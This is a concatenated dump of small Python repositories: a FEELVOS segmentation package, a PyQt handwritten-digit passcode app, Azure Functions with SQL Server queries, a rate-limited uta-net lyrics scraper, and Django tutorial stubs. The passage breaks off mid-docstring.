        tmp_i = cv2.resize(image, dsize=(256, 256), interpolation=cv2.INTER_AREA)
        tmp_m = cv2.resize(mask, dsize=(256, 256), interpolation=cv2.INTER_AREA)
        tmp_m = cv2.cvtColor(tmp_m, cv2.COLOR_BGR2GRAY)
        # Vectorized replacement of the original O(H*W) per-pixel Python loop;
        # identical result, one C-level pass.
        tmp_m[tmp_m == 29] = 255
        fin_images.append(image_transform(tmp_i).float())
        fin_masks.append(image_transform(tmp_m).float())
    return fin_images, fin_masks
--- FILE SEPARATOR ---
import torch
def list_to_tensor(t_list, x, y, device):
    """Convert an x-by-y nested list of numpy arrays to tensors on `device`.

    Mutates t_list in place (each cell is replaced) and also returns it.
    """
    for row in range(x):
        for col in range(y):
            t_list[row][col] = torch.from_numpy(t_list[row][col]).to(device=device)
    return t_list
--- FILE SEPARATOR ---
from setuptools import setup, find_packages
# Package metadata for the `feelvos` distribution.
setup(
    name = 'feelvos',
    version = '0.5',
    description = 'FEELVOS implementation in PyTorch; FEELVOS: Fast End-to-End Embedding Learning for Video Object Segmentation',
    author = 'Younghan Kim',
    author_email = 'godppkyh@mosqtech.com',
    # NOTE(review): install_requires is empty although the package imports
    # torch, torchvision, opencv, natsort, pandas — consider declaring them.
    install_requires= [],
    packages = find_packages(),
    python_requires = '>=3.6'
)
|
[
"/feelvos/dataset.py",
"/feelvos/models/DynamicSegmentationHead.py",
"/feelvos/models/Embeddings.py",
"/feelvos/models/FEELVOS.py",
"/feelvos/models/Matching.py",
"/feelvos/test.py",
"/feelvos/train.py",
"/feelvos/transform.py",
"/feelvos/util/toTensor.py",
"/setup.py"
] |
0-gpa-gang/NumRoll
|
import sqlite3
def create():
    """(Re)build image.db: an `image` table seeded with five image paths.

    The classifier column stores the predicted digit; it defaults to the
    string "N/A" even though it is declared INTEGER — SQLite's flexible
    typing allows this, and real predictions overwrite it later.
    """
    conn = sqlite3.connect('image.db')
    try:
        c = conn.cursor()
        # BUG FIX: a plain DROP TABLE raised sqlite3.OperationalError when the
        # database was fresh and the table did not exist yet.
        c.execute("""DROP TABLE IF EXISTS image""")
        c.execute("""CREATE TABLE image (
            path TEXT PRIMARY KEY,
            classifier INTEGER DEFAULT "N/A"
        )""")
        c.execute("""INSERT INTO image (path)
            VALUES
            ('image/0.jpeg'),
            ('image/1.jpeg'),
            ('image/2.jpeg'),
            ('image/3.jpeg'),
            ('image/4.jpeg');""")
        conn.commit()
    finally:
        # BUG FIX: the original leaked the connection.
        conn.close()


if __name__ == "__main__":
    create()
--- FILE SEPARATOR ---
class Image:
    """Record pairing an image file path with its predicted digit label."""

    def __init__(self, path, classifier):
        # path: filesystem location; classifier: predicted digit (or "N/A").
        self.classifier = classifier
        self.path = path
--- FILE SEPARATOR ---
import sys
from PyQt5 import QtCore, QtGui, uic, QtWidgets
from PyQt5.QtWidgets import QApplication
from PyQt5.QtWidgets import QLabel
from PyQt5.QtWidgets import QWidget
from PyQt5.QtWidgets import QPushButton,QAction, QShortcut
from PyQt5.QtGui import QIcon, QKeySequence
from PyQt5.QtCore import Qt,pyqtSlot
class Canvas(QtWidgets.QMainWindow):
    # A 280x280 drawing surface: mouse drags paint thick white strokes, and
    # save() downsamples the widget to a 28x28 JPEG (MNIST-style input) at
    # image/<index>.jpeg.
    def __init__(self, index):
        super().__init__()
        self.label = QtWidgets.QLabel()
        self.whiteboard = QtGui.QPixmap(280,280)
        #self.setStyleSheet("background-color: black;")
        self.label.setPixmap(self.whiteboard)
        self.setCentralWidget(self.label)
        self.index = index  # which digit slot this canvas writes
        #self.count = 0
        # Previous cursor position; None marks the start of a new stroke.
        self.last_x, self.last_y = None, None

    def mouseMoveEvent(self, e):
        # First move event of a stroke: just record the origin, draw nothing.
        if self.last_x is None:
            self.last_x = e.x()
            self.last_y = e.y()
            return
        cursor = QtGui.QPainter(self.label.pixmap())
        p = QtGui.QPen()
        p.setWidth(12)
        p.setColor(QtGui.QColor('#FFFFFF'))
        cursor.setPen(p)
        cursor.drawLine(self.last_x, self.last_y, e.x(), e.y())
        cursor.end()
        self.update()
        # update the origin for the next event
        self.last_x = e.x()
        self.last_y = e.y()

    def mouseReleaseEvent(self, e):
        # End of stroke: reset so the next drag starts a fresh line.
        self.last_x = None
        self.last_y = None

    def save(self):
        """Grab the widget, downscale to 28x28, save as JPEG, close the window."""
        p = QWidget.grab(self)
        p_resized = p.scaled(28,28,QtCore.Qt.KeepAspectRatio, transformMode=QtCore.Qt.SmoothTransformation)
        fileName = "image/"+ str(self.index) +".jpeg"
        p_resized.save(fileName, 'JPEG')
        print("image saved!")
        self.close()
def save_all(lst_wind):
    """Invoke save() on every canvas window in the list."""
    for window in lst_wind:
        window.save()
def canvases():
    """Show five frameless drawing canvases side by side.

    Ctrl+S on any canvas saves ALL five (each to image/<i>.jpeg) and closes
    them, ending the Qt event loop.
    """
    app = QtWidgets.QApplication(sys.argv)
    windows = []
    shortcuts = []
    for i in range(5):
        windows.append(Canvas(i))
        windows[i].setWindowFlags(QtCore.Qt.FramelessWindowHint)
        # Spread the canvases horizontally, 300px apart.
        windows[i].move(340+i*300,400)
        shortcuts.append(QShortcut(QKeySequence('Ctrl+S'), windows[i]))
        # Every shortcut saves the whole set, not just its own window.
        shortcuts[i].activated.connect(lambda: save_all(windows))
    for i in range(5):
        windows[i].show()
    app.exec_()


if __name__ == "__main__":
    canvases()
--- FILE SEPARATOR ---
import numpy as np
import tensorflow as tf
from PIL import Image
from io_file import *
from tensorflow import keras
from tensorflow.keras.models import load_model
from Database import *
# Enable memory growth on every visible GPU so TensorFlow does not grab all
# VRAM up front; must run before any GPU is initialized.
gpus = tf.config.experimental.list_physical_devices('GPU')
if gpus:
    try:
        for gpu in gpus:
            tf.config.experimental.set_memory_growth(gpu, True)
    except RuntimeError as e:
        # Memory growth cannot be toggled after GPU initialization.
        print(e)
class Classify:
    # Wraps the trained Keras digit model stored alongside as NumRoll.h5.
    def __init__(self):
        self.model = load_model("NumRoll.h5")

    def classify(self, np_arr):
        """Return the argmax class index for one image array."""
        # Wrap in a length-1 batch for model.predict.
        prediction = self.model.predict(np.array([np_arr]))
        return np.argmax(prediction)

    def classify_all(self, lst):
        """Classify every array in lst; returns a list of plain ints."""
        num_list = []
        for i in lst:
            num_list.append(int(self.classify(i)))
        return num_list
class DataSet:
    # Loads the image paths recorded in image.db and converts each file into
    # a normalized grayscale float array for the classifier.
    def __init__(self):
        self.position = read_from_db() # a list of string locations
        self.num_array = [] #a list of numpy arrays

    def get_num_array(self):
        return self.num_array

    def image_to_array(self):
        """Populate num_array: each image scaled to [0,1] and averaged over
        its channel axis (RGB -> single grayscale plane)."""
        total_arrays = []
        for i in self.position:
            image = Image.open(i)
            data = np.array(image).astype('float32')/255.0
            # Mean over the last (channel) axis — assumes a multi-channel
            # image; TODO confirm the saved JPEGs are never single-channel.
            data = np.sum(data, axis=-1)/data.shape[-1]
            total_arrays.append(data)
        self.num_array = total_arrays
def classify_and_save():
    """Full pipeline: rebuild the DB, load the drawn images, classify each
    digit, and write the predictions back to image.db."""
    create()
    data = DataSet()
    data.image_to_array()
    print(data.num_array)
    classifier = Classify()
    final = classifier.classify_all(data.num_array)
    print(final)
    output_to_db(final)


if __name__ == "__main__":
    classify_and_save()
--- FILE SEPARATOR ---
import sys
import os
from PyQt5.QtWidgets import QApplication
from PyQt5.QtWidgets import QLabel
from PyQt5.QtWidgets import QWidget
from PyQt5.QtWidgets import QPushButton
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import pyqtSlot, Qt
from PyQt5 import uic
# Standalone "access denied" popup; launched via os.system from the main GUI
# when the entered code does not match.
app = QApplication(sys.argv)
failWindow = QWidget()
failWindow.setWindowTitle("Error!")
failWindow.setGeometry(150,150,800,300)  # x, y, width, height
failWindow.move(560,560)
failmsg = QLabel('<h2>WRONG CODE! DENIED ACCESS</h2>', parent = failWindow)
failmsg.move(60,60)
failWindow.show()
sys.exit(app.exec_())
--- FILE SEPARATOR ---
import sqlite3
import os
# import the following lines to the main py file
# conn = sqlite3.connect("image.db")
# c = conn.cursor()
def read_from_db():
    """Return the image paths stored in image.db.

    Reads every row of the `image` table and collects the first column
    (the `path` primary key), in the table's default row order.
    """
    conn = sqlite3.connect("image.db")
    try:
        c = conn.cursor()
        c.execute("SELECT * FROM image")
        return [row[0] for row in c.fetchall()]
    finally:
        # BUG FIX: the original never closed the connection.
        conn.close()
def output_to_db(classify):
    """Write predicted labels back to image.db.

    classify[i] is stored against the i-th path returned by read_from_db() —
    both sides rely on SQLite's default row order; TODO confirm an explicit
    ORDER BY is not needed.
    """
    conn = sqlite3.connect("image.db")
    try:
        c = conn.cursor()
        paths = read_from_db()
        for label, location in zip(classify, paths):
            c.execute("UPDATE image SET classifier = (?) WHERE path = (?)", (label, location))
        # Commit once after all updates instead of once per row.
        conn.commit()
    finally:
        # BUG FIX: the original never closed the connection.
        conn.close()
    # if want to see the classified result in a printed list, turn docstring into code
    """
    classified = []
    c.execute("SELECT * FROM image")
    for row in c.fetchall():
        classified.append(row[1])
    print(classified)
    """
def special_case():
    """Easter egg: if the concatenated classifier digits spell 42069, play
    RickRoll.mp4 via VLC (shell command; adjust per system)."""
    conn = sqlite3.connect("image.db")
    c = conn.cursor()
    c.execute("SELECT * FROM image")
    special = ""
    for row in c.fetchall():
        # row[1] is the classifier column.
        special += str(row[1])
    if special == "42069":
        os.system("vlc RickRoll.mp4") # change with system
--- FILE SEPARATOR ---
import sys
import os
from PyQt5.QtWidgets import QApplication
from PyQt5.QtWidgets import QLabel
from PyQt5.QtWidgets import QWidget
from PyQt5.QtWidgets import QPushButton
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import pyqtSlot, Qt
from PyQt5 import uic
import numpy as np
from classifier import *
from canvas import *
import sqlite3
def window():
    """Build and run the lock-screen GUI.

    Shows the title, the instructions and a start button, then blocks in
    the Qt event loop until the application exits.
    """
    # QApplication needs argv for Qt's command-line handling.
    app = QApplication(sys.argv)

    main_widget = QWidget()
    main_widget.setWindowTitle("NumRoll")
    main_widget.setGeometry(150, 150, 1500, 700)  # x, y, width, height
    main_widget.move(1170, 330)

    title_label = QLabel('<h1>Your Homework is Locked!</h1>', parent=main_widget)
    title_label.move(350, 60)
    hint_top = QLabel('<h3>Toggle your mouse to write down your 5-bit passcode</h3>', parent=main_widget)
    hint_top.move(250, 120)
    hint_bottom = QLabel('<h3>When you are done, Press "Ctrl+S" to proceed.</h3>', parent=main_widget)
    hint_bottom.move(340, 600)

    # The start button kicks off the canvas/classify/compare pipeline.
    start_button = QPushButton(main_widget)
    start_button.setStyleSheet("background-color:red")
    start_button.setText("Click here to start.")
    start_button.move(600, 180)
    start_button.clicked.connect(start_pushed)

    main_widget.show()
    # exec_() blocks until the window closes.
    sys.exit(app.exec_())
def start_pushed():
    # Launch the drawing canvas (blocks until the user saves with Ctrl+S),
    # then classify the drawn digits and compare them to the passcode.
    os.system("python3 canvas.py")
    classify_and_save()
    compare('12345')  # NOTE(review): passcode is hard-coded here
def compare(passcode):
    """Compare the classified digits stored in image.db against *passcode*.

    On a match the homework file is opened and the program exits; on the
    magic code "42069" the rickroll plays; otherwise the error window is
    shown.
    """
    conn = sqlite3.connect("image.db")
    try:
        c = conn.cursor()
        c.execute("""SELECT classifier FROM image""")
        # Concatenate the classifier digits into one string.
        entered = "".join(str(row[0]) for row in c.fetchall())
    finally:
        # Fix: the connection used to leak; always release it.
        conn.close()
    print("You have entered: " + entered)
    if entered == passcode:
        os.system("vim homework.txt")
        sys.exit()
    elif entered == "42069":
        os.system("vlc env/RickRoll.mp4")
    else:
        print("Wrong code")
        os.system("python3 error.py")

if __name__ == "__main__":
    window()
--- FILE SEPARATOR ---
import numpy as np
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Flatten, BatchNormalization
from tensorflow.keras.regularizers import l1, l2
from tensorflow.keras.datasets import mnist
from tensorflow.keras.optimizers import Adam, SGD
from tensorflow.keras.utils import to_categorical
from PIL import Image
from tensorflow.keras.mixed_precision import experimental as mixed_precision
# Let TensorFlow grow GPU memory on demand instead of grabbing it all at
# start-up; the RuntimeError is only printed because memory growth must be
# configured before the GPUs are initialized.
gpus = tf.config.experimental.list_physical_devices('GPU')
if gpus:
    try:
        for gpu in gpus:
            tf.config.experimental.set_memory_growth(gpu, True)
    except RuntimeError as e:
        print(e)
# Run the model in mixed float16/float32 precision.
policy = mixed_precision.Policy('mixed_float16')
mixed_precision.set_policy(policy)
class MLModel:
    """MNIST digit classifier built with the Keras functional API.

    __init__ wires the layer graph (conv -> flatten -> dense) into
    self.inputs / self.outputs; define_model() and compile_model() must
    be called before the model can be trained.
    """
    def __init__(self):
        # 28x28 single-channel (grayscale) images.
        self.inputs = keras.Input(shape=(28, 28, 1))
        self.x = self.conv_module(self.inputs, f=32, ks=(5, 5), s=(1, 1), p="same", a="relu", kr=l2(0.001), br=l2(0.001), do=0.4, mp=True)
        # Normalize over the channel axis (-1).
        self.x = BatchNormalization(-1)(self.x)
        #self.x = self.conv_module(self.inputs, f=16, ks=(3, 3), s=(1, 1), p="same", a="relu", kr=l2(0.001), br=l2(0.001), do=0.4, mp=True)
        #self.x = BatchNormalization(-1)(self.x)
        #self.x = self.conv_module(self.inputs, f=32, ks=(3, 3), s=(1, 1), p="same", a="relu", kr=l2(0.001), br=l2(0.001), do=0.4, mp=True)
        #self.x = BatchNormalization(-1)(self.x)
        self.x = self.flatten_module(self.x)
        self.x = BatchNormalization(-1)(self.x)
        self.x = self.dense_module(self.x, u=50, a="relu", kr=l2(0.001), br=l2(0.001))
        self.x = BatchNormalization(-1)(self.x)
        # 10-way softmax output, one unit per digit class.
        self.x = self.dense_module(self.x, u=10, a="softmax", kr=l2(0.001), br=l2(0.001))
        self.outputs = self.x
    def conv_module(self, x, f, ks, s, p, a, kr, br, do=None, mp=False):
        """Conv2D block: f filters of size ks, stride s, padding p and
        activation a; optional 2x2 max-pool (mp) and dropout rate (do)."""
        x = Conv2D(filters=f, kernel_size=ks, strides=s, padding=p, activation=a, kernel_regularizer=kr, bias_regularizer=br)(x)
        if mp:
            x = MaxPooling2D(pool_size=(2, 2))(x)
        if do != None:
            x = Dropout(do)(x)
        return x
    def flatten_module(self, x):
        """Flatten the feature maps and project to 100 relu units with 50% dropout."""
        x = Flatten()(x)
        x = Dense(100, activation="relu", kernel_regularizer=l2(0.001), bias_regularizer=l2(0.001))(x)
        x = Dropout(0.5)(x)
        return x
    def dense_module(self, x, u, a, kr, br, do=None):
        """Dense layer of u units with activation a (the do parameter is
        currently unused)."""
        x = Dense(units=u, activation=a, kernel_regularizer=kr, bias_regularizer=br)(x)
        return x
    def define_model(self):
        """Materialize the keras.Model from the wired inputs/outputs."""
        self.model = keras.Model(inputs=self.inputs, outputs=self.outputs, name="mnist_model")
    def compile_model(self, optimizer, loss, metrics):
        """Compile self.model with the given optimizer, loss and metrics."""
        self.model.compile(optimizer=optimizer, loss=loss, metrics=metrics)
def train():
    """Train the MNIST model for 60 epochs and save it to NumRoll.h5."""
    net = MLModel()
    net.define_model()
    net.compile_model(optimizer=SGD(lr=0.0007, momentum=0.9), loss="categorical_crossentropy", metrics=['accuracy'])

    (train_x, train_y), (test_x, test_y) = mnist.load_data()
    # Add the channel axis and scale pixel values into [0, 1].
    train_x = train_x.reshape((train_x.shape[0], 28, 28, 1)).astype("float32") / 255
    test_x = test_x.reshape((test_x.shape[0], 28, 28, 1)).astype("float32") / 255
    # One-hot encode the digit labels.
    train_y = to_categorical(train_y)
    test_y = to_categorical(test_y)

    net.model.fit(x=train_x, y=train_y, batch_size=None, epochs=60, verbose=1, validation_data=(test_x, test_y), use_multiprocessing=True)
    net.model.save("NumRoll.h5")

if __name__ == "__main__":
    train()
|
[
"/Database.py",
"/Images.py",
"/canvas.py",
"/classifier.py",
"/error.py",
"/io_file.py",
"/main.py",
"/training.py"
] |
0-jam/azfunc
|
import logging
import azure.functions as func
from .monkey_generator import generate_text
def main(req: func.HttpRequest) -> func.HttpResponse:
    """HTTP entry point: generate `gen_size` random characters.

    `gen_size` is read from the query string first, then from a JSON
    request body. Missing or non-numeric values yield a 400 response.
    """
    logging.info('Python monkey text generator.')

    gen_size = req.params.get('gen_size')
    if not gen_size:
        try:
            req_body = req.get_json()
        except ValueError:
            pass
        else:
            gen_size = req_body.get('gen_size')

    if gen_size:
        try:
            size = int(gen_size)
        except (TypeError, ValueError):
            # Fix: a non-numeric gen_size used to raise and surface as a 500.
            return func.HttpResponse(
                "gen_size must be an integer",
                status_code=400
            )
        return func.HttpResponse(generate_text(size))
    else:
        return func.HttpResponse(
            "Please pass a gen_size on the query string or in the request body",
            status_code=400
        )
--- FILE SEPARATOR ---
import random
# All characters on the keyboard as integers
CHARS = list(range(32, 128)) + [8, 9, 10]

def shuffle(orig_list):
    """Return a new list with the elements of orig_list in random order."""
    return random.sample(orig_list, k=len(orig_list))

def generate_text(gen_size=100):
    """Return gen_size uniformly random keyboard characters as a string.

    Fix: picking one character no longer shuffles the whole alphabet
    (O(len(CHARS)) per character) — random.choice draws directly — and
    the string is assembled with join instead of a quadratic +=.
    """
    return ''.join(chr(random.choice(CHARS)) for _ in range(gen_size))
--- FILE SEPARATOR ---
import logging
import azure.functions as func
from .sql_controller import get_places
def main(req: func.HttpRequest) -> func.HttpResponse:
    """HTTP entry point: return all rows of dbo.places as a JSON response."""
    logging.info('Python HTTP trigger function processed a request.')
    return func.HttpResponse(format(get_places()), mimetype='application/json')
--- FILE SEPARATOR ---
import json
import os
import pyodbc
# Database connection settings, all taken from the environment so no
# credentials are checked in. Each value is None when its variable is unset.
ENV = os.environ
DB_ENDPOINT = ENV.get('SQL_DB_ENDPOINT')
DB_NAME = ENV.get('SQL_DB_NAME')
DB_USERNAME = ENV.get('SQL_DB_USERNAME')
DB_PASSWORD = ENV.get('SQL_DB_PASSWORD')
# Must match the ODBC driver installed on the host.
SQL_DRIVER = '{ODBC Driver 17 for SQL Server}'
def establish_connection() -> pyodbc.Connection:
    """Open a pyodbc connection to the configured SQL Server database."""
    conn_parts = (
        'DRIVER=' + SQL_DRIVER,
        'SERVER=' + DB_ENDPOINT,
        'PORT=1433',
        'DATABASE=' + DB_NAME,
        'UID=' + DB_USERNAME,
        'PWD=' + DB_PASSWORD,
    )
    return pyodbc.connect(';'.join(conn_parts))
def exec_sql(query: str) -> list:
    """Execute *query* and return the result as a list of dicts.

    SELECT-style queries return one {column_name: value} dict per row.
    If fetchall() raises pyodbc.ProgrammingError (no result set), a
    single dict reporting the affected row count is returned instead.
    The transaction is committed in either case.

    NOTE(review): pyodbc's connection context manager commits/rolls back
    but does not close the connection — confirm whether an explicit
    close() is wanted here. Also, for statements with no result set,
    cursor.description may be None before fetchall() is reached — verify
    the ProgrammingError branch is actually reachable.
    """
    with establish_connection() as connection:
        with connection.cursor() as cursor:
            cursor.execute(query)
            column_names = [desc[0] for desc in cursor.description]
            try:
                rows = cursor.fetchall()
                return [dict(zip(column_names, row)) for row in rows]
            except pyodbc.ProgrammingError:
                return [{'message': 'affected {} rows'.format(cursor.rowcount)}]
            finally:
                connection.commit()
def get_places():
    """Fetch every row of dbo.places and return it as a JSON string."""
    rows = exec_sql('select * from dbo.places')
    # Serialize the decimal-typed latitude/longitude columns as floats.
    return json.dumps(rows, ensure_ascii=False, default=float)
--- FILE SEPARATOR ---
import os
import pyodbc
import json
# Connection settings read from the environment (each is None when unset).
ENV = os.environ
DB_ENDPOINT = ENV.get('SQL_DB_ENDPOINT')
DB_NAME = ENV.get('SQL_DB_NAME')
DB_USERNAME = ENV.get('SQL_DB_USERNAME')
DB_PASSWORD = ENV.get('SQL_DB_PASSWORD')
# Must match the ODBC driver installed on the host.
SQL_DRIVER = '{ODBC Driver 17 for SQL Server}'
def establish_connection():
    """Open a pyodbc connection to the configured SQL Server database."""
    connection_string = ';'.join([
        'DRIVER=' + SQL_DRIVER,
        'SERVER=' + DB_ENDPOINT,
        'PORT=1433',
        'DATABASE=' + DB_NAME,
        'UID=' + DB_USERNAME,
        'PWD=' + DB_PASSWORD,
    ])
    return pyodbc.connect(connection_string)
def rows2json(rows):
    """Serialize an iterable of DB rows to a JSON array of arrays."""
    converted = [tuple(row) for row in rows]
    return json.dumps(converted, ensure_ascii=False)
def exec_sql():
    """Run a fixed sample query and return the result as a JSON string.

    SELECT results are serialized via rows2json(); if the statement has
    no result set, fetchall() raises pyodbc.ProgrammingError and a
    row-count message is returned instead.
    """
    connection = establish_connection()
    try:
        cursor = connection.cursor()
        try:
            cursor.execute("SELECT TOP 20 pc.Name as CategoryName, p.name as ProductName FROM [SalesLT].[ProductCategory] pc JOIN [SalesLT].[Product] p ON pc.productcategoryid = p.productcategoryid")
            try:
                result_json = rows2json(cursor.fetchall())
            except pyodbc.ProgrammingError:
                result_json = json.dumps("affected {} rows".format(cursor.rowcount))
        finally:
            # Fix: cursor and connection used to leak if execute() raised.
            cursor.close()
    finally:
        connection.close()
    return result_json
|
[
"/azmonkeygen/__init__.py",
"/azmonkeygen/monkey_generator.py",
"/get-places/__init__.py",
"/get-places/sql_controller.py",
"/sqlcontroller/sql_controller.py"
] |
0-jam/utanet_scraper
|
import argparse
import json
from pathlib import Path
def main():
    """Extract one attribute from every song-JSON file in a directory.

    Reads each JSON file produced by utanet_scraper.py, collects the
    requested attribute of every song, optionally de-duplicates, and
    writes one value per line to the output file.
    """
    parser = argparse.ArgumentParser(description='utanet_scraper.pyで抽出した曲情報から特定の項目を抽出')
    parser.add_argument('input', type=str, help='入力ディレクトリ名')
    parser.add_argument('output', type=str, help='出力ファイル名')
    parser.add_argument('-a', '--attribute', type=str, default='lyric', choices=['title', 'artist', 'lyricist', 'composer', 'lyric'], help="抽出したい項目(デフォルト:'lyric')")
    parser.add_argument('--allow_dups', action='store_true', help='項目の重複を許容(デフォルト:false)')
    args = parser.parse_args()

    extracted_values = []
    for json_path in Path(args.input).iterdir():
        # Fix: the scraper writes UTF-8; read it explicitly so this does
        # not depend on the locale's default encoding.
        with json_path.open(encoding='utf-8') as json_file:
            json_dict = json.load(json_file)
        extracted_values.extend([value[args.attribute] for value in json_dict.values()])

    if not args.allow_dups:
        # Fix: de-duplicate with dict.fromkeys instead of set() so the
        # original order is kept and the output file is deterministic.
        extracted_values = list(dict.fromkeys(extracted_values))

    with Path(args.output).open('w', encoding='utf-8') as out:
        out.write('\n'.join(extracted_values))

if __name__ == "__main__":
    main()
--- FILE SEPARATOR ---
import time
import urllib
from beautifulscraper import BeautifulScraper
from tqdm import tqdm
# Shared scraper instance and the site root URL.
scraper = BeautifulScraper()
domain = 'https://www.uta-net.com'

# Search field -> value of the "Aselect" query parameter.
attributes = {
    # artist name
    'artist': '1',
    # song title
    'title': '2',
    # lyricist name
    'lyricist': '3',
    # composer name
    'composer': '8',
}

# Match mode -> value of the "Bselect" query parameter.
match_modes = {
    # exact match
    'exact': '4',
    # partial match
    'partial': '3',
}
def get_page(url):
    """Fetch *url*, sleeping one second first to avoid hammering the server."""
    time.sleep(1.0)
    return scraper.go(url)
def search_song_ids(query, attribute='lyricist', match_mode='exact'):
    """Search uta-net and return the relative URLs of all matching songs.

    Builds the search URL, walks every result page, and collects the
    link of each song row (cells with class "td1").

    Parameters:
        query: Search keyword.
        attribute: Which field to search (a key of `attributes`).
        match_mode: 'exact' or 'partial' (a key of `match_modes`).
    """
    # Percent-encode the query: Japanese text is not processed correctly otherwise.
    search_url = domain + '/search/?Aselect=' + attributes[attribute] + '&Keyword=' + urllib.parse.quote(query) + '&Bselect=' + match_modes[match_mode] + '&sort='
    print('曲リストを取得しています:', search_url)
    bodies = [get_page(search_url)]
    # The pager links on the first page tell us how many result pages exist.
    pages = bodies[0].select('#page_list')[0].find_all('a')
    if len(pages) > 0:
        page_urls = [urllib.parse.urlparse(page.get('href')) for page in pages]
        queries = [urllib.parse.parse_qs(page.query) for page in page_urls]
        last_page = page_urls[-1]
        # The largest pnum parameter among the pager links is the page count.
        last_page_num = max([int(query['pnum'][0]) for query in queries])
        lpq = queries[-1]
        print(last_page_num, 'ページ見つかりました')
        for pnum in tqdm(range(2, last_page_num + 1)):
            # Generate a fresh URL by changing only the page number.
            lpq['pnum'] = [str(pnum)]
            page = urllib.parse.ParseResult(
                last_page.scheme,
                last_page.netloc,
                last_page.path,
                last_page.params,
                urllib.parse.urlencode(lpq, True),
                ''
            )
            page_url = urllib.parse.urlunparse(page)
            bodies.append(get_page(page_url))
    else:
        print('1ページ見つかりました')
    song_ids = []
    for body in bodies:
        # Extract the lyric-page URL of each search result row.
        for td in body.select('.td1'):
            song_ids.append(td.find_all('a')[0].get('href'))
    return song_ids
def extract_song(song_id):
    """Scrape one lyric page and return {song_id: song attributes}.

    *song_id* is the relative URL of the song page (e.g. '/song/123/').
    """
    song_url = domain + song_id
    print('曲データを抽出しています:', song_url)
    body = get_page(song_url)
    title = body.select('.song-infoboard h2')[0].text
    # Extract the lyric with its line breaks replaced by a slash '/'.
    lyric = body.find(id='kashi_area').get_text('/')
    artist = body.select('[itemprop="recordedAs"]')[0].text.strip()
    lyricist = body.select('[itemprop="lyricist"]')[0].text
    composer = body.select('[itemprop="composer"]')[0].text
    return {
        song_id: {
            'title': title,
            'lyric': lyric,
            'artist': artist,
            'lyricist': lyricist,
            'composer': composer,
        }
    }
--- FILE SEPARATOR ---
import argparse
import json
import sqlite3
from pathlib import Path
def main():
    """Convert the scraper's per-song JSON files into one SQLite database.

    Creates the utanet_songs table if needed and inserts one row per
    JSON file; the file stem (e.g. "7" of 7.json) is the primary-key
    song_id.
    """
    parser = argparse.ArgumentParser(description='utanet_scraper.py で抽出した JSON ファイルを SQLite DB に変換')
    parser.add_argument('json_dir', type=str, help='JSON ファイルのあるディレクトリ')
    parser.add_argument('sqlite_file', type=str, help='SQLite ファイル')
    args = parser.parse_args()

    sqlite_file = Path(args.sqlite_file)
    sqlite_connection = sqlite3.connect(sqlite_file)
    try:
        sqlite_cursor = sqlite_connection.cursor()
        sqlite_cursor.execute('''
            create table if not exists utanet_songs(
                song_id int primary key,
                title text,
                lyric text,
                artist text,
                lyricist text,
                composer text
            )
        ''')

        query_string = '''
            insert into utanet_songs(song_id, title, lyric, artist, lyricist, composer)
            values (?, ?, ?, ?, ?, ?)
        '''
        for json_path in Path(args.json_dir).iterdir():
            # Fix: the scraper writes UTF-8; read it explicitly so the
            # conversion does not depend on the locale's default encoding.
            with json_path.open(encoding='utf-8') as json_file:
                song_dict = json.load(json_file)
            print('処理中:', json_path.name)
            song_id = int(json_path.stem)
            # Each file holds a single {song_url: attributes} mapping.
            song_data = tuple(song_dict.values())[0]
            sqlite_cursor.execute(query_string, (
                song_id,
                song_data['title'],
                song_data['lyric'],
                song_data['artist'],
                song_data['lyricist'],
                song_data['composer'],
            ))
        sqlite_connection.commit()
    finally:
        # Fix: close the connection even if a file fails to parse.
        sqlite_connection.close()
    print('完了')

if __name__ == "__main__":
    main()
--- FILE SEPARATOR ---
import argparse
import json
import urllib
from pathlib import Path
from modules.utanet import extract_song
def main():
    """Scrape songs one ID at a time until interrupted with Ctrl+C.

    Song IDs are tried sequentially starting at --starts_with; existing
    output files are skipped and missing IDs (HTTP errors) are reported
    and skipped. The loop is endless by design.
    """
    # Fix: `import urllib` alone does not guarantee the urllib.error
    # submodule is loaded (the original relied on another module pulling
    # it in as a side effect); import it explicitly before use.
    import urllib.error

    parser = argparse.ArgumentParser(description='曲情報を抽出(Ctrl + C で中止)')
    parser.add_argument('-o', '--output_dir', type=str, default='songs', help="出力ディレクトリ名(デフォルト:'./songs')")
    parser.add_argument('-s', '--starts_with', type=int, default=1, help="指定した ID から抽出を開始(デフォルト:'1')")
    args = parser.parse_args()

    output_dir = Path(args.output_dir)
    Path.mkdir(output_dir, parents=True, exist_ok=True)
    song_count = args.starts_with

    while True:
        try:
            song_json_path = output_dir.joinpath('{}.json'.format(song_count))
            if song_json_path.is_file():
                print('スキップ:ファイル "{}" は既に存在します'.format(song_json_path))
                continue
            song_dict = extract_song('/song/{}/'.format(song_count))
            with song_json_path.open('w', encoding='utf-8') as song_json:
                song_json.write(json.dumps(song_dict, ensure_ascii=False, indent=2))
        except urllib.error.HTTPError:
            print('ID: {} が見つかりません'.format(song_count))
            continue
        finally:
            # Advance to the next ID whether this one succeeded or not.
            song_count += 1

if __name__ == '__main__':
    main()
|
[
"/json_extractor.py",
"/modules/utanet.py",
"/sqlite_converter.py",
"/utanet_scraper.py"
] |
0-k-1/Practice_turorail
|
from django.urls import path
import books
from books.views import PublisherList

# Route the publisher listing page to the class-based ListView.
urlpatterns = [
    path('publishers/',PublisherList.as_view())
]
--- FILE SEPARATOR ---
from django.shortcuts import render
# Create your views here.
from django.views.generic import ListView
from books.models import Publisher
class PublisherList(ListView):
    """Class-based view listing every Publisher object."""
    model = Publisher
|
[
"/books/urls.py",
"/books/views.py"
] |
0-k-1/TodoMVC2
|
from django.db import models
#from django.contrib.auth.models import User
class Todo(models.Model):
    """A single todo item backing the TodoMVC front-end."""
    # Display text of the task.
    title = models.CharField(max_length=50)
    # Whether the task has been checked off.
    completed = models.BooleanField(default=False)
--- FILE SEPARATOR ---
# from django.urls import path
from django.conf.urls import url
from App.views import todoMVC_view,save_view
urlpatterns = [
    # Fix: url('', ...) is an unanchored regex that matched *every* path
    # (including save/), making the save view unreachable; match save/
    # first and anchor the index pattern to the empty path.
    url(r'^save/', save_view, name='save'),
    url(r'^$', todoMVC_view),
]
--- FILE SEPARATOR ---
from django.shortcuts import render,redirect
from App.models import Todo
import json
# from django.forms.models import model_to_dict
def todoMVC_view(request):
    """Render the TodoMVC page with all stored todos serialized as JSON.

    The template's front-end code parses the "list" context value, so it
